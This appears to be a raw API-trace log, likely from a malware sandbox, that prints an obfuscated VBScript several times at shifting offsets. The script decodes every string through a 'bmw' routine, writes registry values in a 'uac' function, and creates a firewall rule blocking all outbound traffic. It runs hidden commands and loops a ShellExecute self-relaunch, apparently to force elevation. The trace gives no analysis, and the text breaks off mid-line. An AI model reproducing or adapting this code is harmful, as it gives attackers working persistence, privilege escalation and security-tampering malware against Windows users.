bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 98 [0226.377] wcsncmp (_String1="nname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0226.377] wcsncmp (_String1="name = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0226.377] wcsncmp (_String1="ame = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84 [0226.377] wcsncmp (_String1="me = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 96 [0226.377] wcsncmp (_String1="e = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite 